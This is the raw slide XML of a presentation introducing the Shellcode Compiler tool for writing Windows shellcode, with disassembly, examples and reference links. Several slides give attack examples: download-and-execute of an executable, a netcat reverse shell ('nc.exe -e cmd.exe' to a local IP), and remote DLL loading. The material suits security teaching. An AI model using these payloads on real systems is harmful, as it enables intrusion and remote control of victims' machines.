            <a:endParaRPr lang="ro-RO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ro-RO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ro-RO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000000EC  83C40C            add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esp,byte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+0xc                 ; Clean stack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000000EF  5A                pop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;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GetProcAddress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000000F0  5B                pop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; kernel32 base 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000000F1  6865737361        push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0x61737365             ;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essa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000000F6  836C240361        sub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[esp+0x3],byte +0x61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000000FB  6850726F63        push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0x636f7250             ; Proc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00000100  6845786974        push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0x74697845             ; Exit        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00000105  54                push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00000106  53                push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ebx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00000107  FFD2              call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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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GetProc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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o-R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ro-R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00000109  FFD0              call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;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ExitProcess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endParaRPr lang="en-US" sz="1600" dirty="0" err="1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5432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Shellcode compiler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5682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think?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0361" y="1554247"/>
            <a:ext cx="10777356" cy="3293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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>It looks complicated to write a Windows shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2667" dirty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lang="en-US" sz="2667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endParaRPr lang="en-US" sz="2667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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>But what can you do if you want to create a custom shellcode?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endParaRPr lang="en-US" sz="2667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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Learning assembler and Windows internals will not be easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2667" dirty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lang="en-US" sz="2667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endParaRPr lang="en-US" sz="2667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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Shellcode Compiler! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12898930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15" y="1389575"/>
            <a:ext cx="5440797" cy="507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50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93701" y="2210972"/>
            <a:ext cx="3799840" cy="3474720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is Shellcode compiler?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is a compiler?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is a shellcode?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Process structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shellcode limitations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3701" y="1502833"/>
            <a:ext cx="10579100" cy="4889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will talk about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133146" y="2464190"/>
            <a:ext cx="3799840" cy="34747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  <a:cs typeface="+mn-cs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aseline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000" baseline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400" baseline="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20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sz="1867" kern="0" dirty="0"/>
              <a:t>Linux shellcodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0"/>
              <a:t>Windows shellcodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0"/>
              <a:t>Windows shellcode example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0"/>
              <a:t>Shellcode compiler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0"/>
              <a:t>More details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19303940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0361" y="1842762"/>
            <a:ext cx="11028641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function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</a:rPr>
              <a:t>MessageBoxA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("user32.dll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");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function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</a:rPr>
              <a:t>ExitProcess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("kernel32.dll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");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</a:rPr>
              <a:t>MessageBoxA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(0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,"This is a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MessageBox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example","Shellcode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Compiler",0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</a:rPr>
              <a:t>ExitProcess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(0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);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04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files and Windows Registry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0360" y="1386724"/>
            <a:ext cx="11326461" cy="485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function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</a:rPr>
              <a:t>CopyFileA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("kernel32.dll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");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function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</a:rPr>
              <a:t>DeleteFileA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("kernel32.dll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");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function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ExitProcess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("kernel32.dll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");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</a:rPr>
              <a:t>CopyFileA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("C:\Windows\System32\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calc.exe","C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:\Users\Ionut\Desktop\calc.exe",0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</a:rPr>
              <a:t>DeleteFileA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("C:\Users\Ionut\Desktop\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Delete.txt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");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ExitProcess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(0);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------------------------------------------------------------------------------------------------------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function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</a:rPr>
              <a:t>RegSetKeyValueA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("advapi32.dll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");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function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ExitProcess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("kernel32.dll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");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</a:rPr>
              <a:t>RegSetKeyValueA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(2147483649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,"Software\Microsoft\Notepad","Test",1,"Nytro",5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ExitProcess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(0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);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5718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Execute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899" y="1675236"/>
            <a:ext cx="1064458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function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URLDownloadToFileA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("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urlmon.dll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");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function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WinExec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("kernel32.dll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");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function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ExitProcess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("kernel32.dll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");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URLDownloadToFileA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(0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,"https://rstforums.com/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fisiere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/calc.exe","calc.exe",0,0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WinExec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("calc.exe",0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ExitProcess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(0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);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13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shell (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc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0360" y="1628701"/>
            <a:ext cx="1097679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function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URLDownloadToFileA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("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urlmon.dll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");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function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WinExec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("kernel32.dll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");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function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ExitProcess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("kernel32.dll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");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URLDownloadToFileA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(0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,"https://rstforums.com/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fisiere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/nc.exe","nc.exe",0,0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WinExec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("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nc.exe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-e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cmd.exe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192.168.0.100 1337",0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ExitProcess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(0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);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875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Load DLL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359" y="1572862"/>
            <a:ext cx="1112480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function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URLDownloadToFileA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("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urlmon.dll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");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function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LoadLibraryA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("kernel32.dll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");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function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ExitProcess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("kernel32.dll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");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URLDownloadToFileA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(0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,"https://rstforums.com/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fisiere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/DLLExample.dll","SC.dll",0,0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LoadLibraryA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("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SC.dll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");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ExitProcess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(0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);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95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9319" y="2764142"/>
            <a:ext cx="4616208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7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Let’s try it!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14411727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48639" y="1465755"/>
            <a:ext cx="10565848" cy="3550648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is not possible to use the return value of an API call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is not possible to use pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is not possible to declare variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It does not show warnings or errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It does not properly check for tabs and spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It does not support arithmetic operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It does not support hex strings or \x characters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44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WinAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> functions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40360" y="1423953"/>
            <a:ext cx="11233392" cy="443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Windows API Index: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1867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https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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://msdn.microsoft.com/en-us/library/windows/desktop/ff818516(v=vs.85).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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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endParaRPr lang="en-US" sz="1867" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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User Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Windows 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Environment (Shell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380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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User 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Input and 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Messaging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Data 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access and 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storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Diagnostics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Graphics 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and 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Multimedia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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System Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Security 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and 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Identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Application 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Installation and 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Servicing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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System 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Admin and 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Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Networking 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and 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Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Deprecated </a:t>
            </a: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or legacy APIs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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311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 vs Unicode on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WinAPI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673" y="1600783"/>
            <a:ext cx="11754577" cy="269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Windows API functions that manipulate characters are generally implemented in one of three formats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80990" indent="-380990">
              <a:buFont typeface="Arial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 generic version that can be compiled for either Windows code pages or Unicode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:buFont typeface="Arial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 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Windows code page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 version with the letter "A" used to indicate "ANSI"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:buFont typeface="Arial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 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Unicode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 version with the letter "W" used to indicate "wide"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https://msdn.microsoft.com/en-us/library/windows/desktop/dd374089(v=vs.85).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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>aspx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85774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360" y="1386723"/>
            <a:ext cx="11488672" cy="4873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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode Compiler takes as input a source code written in a custom programming language similar to C/C++ code.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endParaRPr lang="en-US" sz="2667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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>It uses DFA (Deterministic Finite Automaton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>) to parse the source code and generates assembly code that avoids NULL-bytes after it is assembled.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endParaRPr lang="en-US" sz="2667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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>It generates calls to each function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189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FontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SpecifiedDLLs.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189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FontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(DLL, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FunctionName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189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FontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FunctionName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(“Parameters”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49029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62" y="2530117"/>
            <a:ext cx="9134535" cy="199439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Shellcode compiler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113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Shellcode Compiler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9598" y="1656621"/>
            <a:ext cx="10302705" cy="314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GitHub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https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://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github.com/NytroRST/ShellcodeCompiler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You will find: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09585" indent="-609585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FontTx/>
              <a:buChar char="-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Source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609585" indent="-609585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FontTx/>
              <a:buChar char="-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Binary release</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609585" indent="-609585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FontTx/>
              <a:buChar char="-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7990314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9874" y="74454"/>
            <a:ext cx="2694337" cy="147591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Links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807" y="1710049"/>
            <a:ext cx="11959685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1200" dirty="0"/>
              <a:t>Introduction to Windows shellcode development – Part 1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Introduction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>to Windows shellcode development – Part 2 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Introduction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>to Windows shellcode development – Part 3 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Shellcoder's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Handbook - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Sockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, Shellcode, Porting, and Coding - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.amazon.com/Sockets-Shellcode-Porting-Coding-Professionals/dp/1597490059</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Understanding Windows Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.hick.org/code/skape/papers/win32-shellcode.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>History and Advances in Windows Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://phrack.org/issues/62/7.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Writing ia32 alphanumeric shellcodes - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://phrack.org/issues/57/15.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Windows x64 Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://mcdermottcybersecurity.com/articles/windows-x64-shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Writing Shellcode with a C Compiler - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://nickharbour.wordpress.com/2010/07/01/writing-shellcode-with-a-c-compiler/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Writing Optimized Windows Shellcode in C - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://www.symantec.com/connect/articles/windows-syscall-shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Didier Stevens - Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://blog.didierstevens.com/programs/shellcode/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Synesthesia: Modern shellcode Synthesis - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>http://www.msreverseengineering.com/blog/2016/11/8/synesthesia-modern-shellcode-synthesis-ekoparty-2016-talk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r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1200" dirty="0"/>
              <a:t>Online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>x86 / x64 Assembler and Disassembler - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>defuse.ca/online-x86-assembler.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r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1200" dirty="0"/>
              <a:t>Archived </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Shellcode for various Operating Systems and Architectures - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/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1200" dirty="0"/>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
